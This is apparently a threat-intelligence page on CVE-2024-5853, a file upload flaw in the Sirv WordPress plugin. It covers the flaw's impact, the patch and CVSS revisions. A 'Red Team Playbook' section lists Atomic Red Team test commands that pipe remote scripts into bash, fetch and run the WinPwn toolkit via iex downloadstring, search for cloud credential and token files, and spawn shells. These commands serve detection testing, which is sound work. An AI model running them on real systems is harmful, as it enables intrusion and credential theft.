CVE-2024-5853
Overview
This vulnerability is an arbitrary file upload flaw caused by insufficient validation of uploaded file types within the sirv_upload_file_by_chanks AJAX action of the Sirv Image Optimizer, Resizer and CDN WordPress plugin. The affected component fails to enforce file type restrictions, allowing malicious files to be uploaded. The issue exists in all plugin versions up to and including 7.2.6.
Vulnerability Description
The Image Optimizer, Resizer and CDN – Sirv plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the sirv_upload_file_by_chanks AJAX action in all versions up to, and including, 7.2.6. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.
Impact
An attacker with Contributor-level or higher access can upload arbitrary files to the server, potentially leading to remote code execution and full site compromise. This requires authentication but no user interaction beyond login. Successful exploitation can result in unauthorized code execution, data breaches, or service disruption. The vulnerability is exploitable remotely over the network (AV:N), with low attack complexity (AC:L) and privileges required (PR:L), without user interaction (UI:N), impacting confidentiality, integrity, and availability (C:H/I:H/A:H).
Solution
Users should upgrade the Sirv Image Optimizer, Resizer and CDN WordPress plugin to a version later than 7.2.6 where the vulnerability is addressed. The Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/e89b40ec-1952-46e3-a91b-bd38e62f8929) provides detailed patch information. Additionally, reviewing the plugin’s changelog and applying the update from the official WordPress plugin repository is recommended to mitigate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Sirv plugin for WordPress arises from inadequate file type validation during the file upload process. Specifically, the AJAX action responsible for handling file uploads does not properly check the types of files being uploaded. This oversight allows authenticated users with Contributor-level access or higher to upload arbitrary files to the server. The implications of this flaw are significant, as it could potentially enable attackers to execute malicious code remotely, leading to a full compromise of the affected website.
Exploitation of this vulnerability can occur through various attack vectors. An authenticated attacker could leverage their access to upload malicious scripts disguised as legitimate files, such as images or documents. Once these files are on the server, the attacker may execute them to gain control over the web application or the underlying server. This could lead to further exploitation, such as data exfiltration, website defacement, or the establishment of a persistent backdoor for future access. The ease of exploitation, combined with the commonality of WordPress installations, makes this vulnerability particularly concerning for website administrators.
The real-world impact of this vulnerability can be profound, especially for businesses that rely on their online presence for revenue and customer engagement. A successful exploitation could result in data breaches, loss of customer trust, and significant financial repercussions. Furthermore, the presence of malicious files on a server can lead to blacklisting by search engines and security services, which can severely impact a business's reputation and visibility online. The potential for remote code execution means that attackers could also pivot to other systems within the network, escalating the risk to the entire organizational infrastructure.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is crucial to ensure that the Sirv plugin is updated to the latest version, as updates often include patches for known vulnerabilities. Additionally, organizations should conduct regular security audits and vulnerability assessments to identify and remediate weaknesses in their web applications. Implementing a Web Application Firewall (WAF) can also provide an additional layer of security by filtering out potentially malicious requests before they reach the server. Lastly, strict access controls should be enforced, limiting the number of users with Contributor-level access or higher to minimize the risk of exploitation.
In conclusion, the vulnerability in the Sirv plugin poses a significant threat to WordPress sites, particularly those with inadequate security measures. The combination of arbitrary file uploads and the potential for remote code execution creates a high-risk scenario for affected organizations. By prioritizing timely updates, rigorous security practices, and proactive monitoring, businesses can mitigate the risks associated with this vulnerability and protect their digital assets from malicious actors.
The CVSS score for CVE-2024-5853 has been revised upward from 8.8 to 9.9, reflecting a reassessment of the vulnerability’s criticality based on its exploitation potential and impact. This change underscores the heightened risk posed by the arbitrary file upload flaw in the Sirv WordPress plugin, particularly given the low privilege threshold required for exploitation—Contributor-level access. Although our telemetry continues to show no emergence of new exploit techniques or widespread active exploitation, the increased severity rating signals that the vulnerability’s capability to facilitate remote code execution is more imminent and consequential than previously assessed. The EPSS score remains stable, indicating consistent likelihood of exploitation but no rapid escalation in attack attempts. For defenders, this recalibration demands increased vigilance and prioritization in patch management and access control, as the window for potential compromise is effectively narrower. The elevated threat level also suggests that threat actors may intensify efforts to weaponize this vulnerability, making proactive detection and response measures more critical in the near term.
Update 2 — May 21, 2026
Recent updates to the CVSS scoring for CVE-2024-5853 reflect a downward adjustment from 9.9 to 8.8, indicating a refined understanding of the vulnerability’s exploitability and impact. This recalibration stems from deeper analysis of the attack surface and the required attacker privileges, which are limited to authenticated users with Contributor-level access or higher. CSURFACE threat intelligence confirms that while the vulnerability remains highly critical, the likelihood of widespread remote code execution exploitation is somewhat moderated compared to initial assessments. Our telemetry continues to show a stable exploitation probability, with no significant surge in active attacks or new proof-of-concept exploits emerging in the wild. This stability suggests that threat actors have not yet intensified their operational focus on this vulnerability, although the potential for weaponization remains. For defenders, this nuanced risk profile underscores the importance of maintaining rigorous access controls and monitoring authenticated user activities, as the attack vector is constrained but still viable. The updated risk level reinforces the need for sustained vigilance but also signals that immediate, large-scale exploitation campaigns have not materialized, allowing security teams to prioritize remediation efforts accordingly.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sirv | Sirv | All |
cpe:2.3:a:sirv:sirv:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-5853 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/e89b40ec-1952-46e3-a91b-bd38e62f8929?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3103410/sirv/trunk/sirv.php |